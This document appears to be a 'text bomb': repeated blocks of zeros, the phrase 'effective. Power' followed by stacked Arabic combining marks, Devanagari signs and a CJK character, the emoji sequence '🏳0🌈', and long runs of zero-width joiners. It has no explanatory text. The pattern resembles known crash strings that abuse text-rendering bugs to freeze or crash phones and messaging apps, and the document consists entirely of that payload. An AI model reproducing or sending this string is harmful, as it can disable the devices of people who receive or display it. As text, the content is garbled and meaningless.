000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 0000000000effective. Power لُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ 冗 --00000000000    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       🏳0🌈    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍ 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000🏳0🌈   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 0000000000effective. Power لُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ 冗 --00000000000    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       🏳0🌈    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍ 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000🏳0🌈   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 0000000000effective. Power لُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ 冗 --00000000000    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       🏳0🌈    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍ 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000🏳0🌈   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 0000000000effective. Power لُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ 冗 --00000000000    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       🏳0🌈    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍ 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000🏳0🌈   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 0000000000effective. Power لُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ 冗 --00000000000    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       🏳0🌈    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      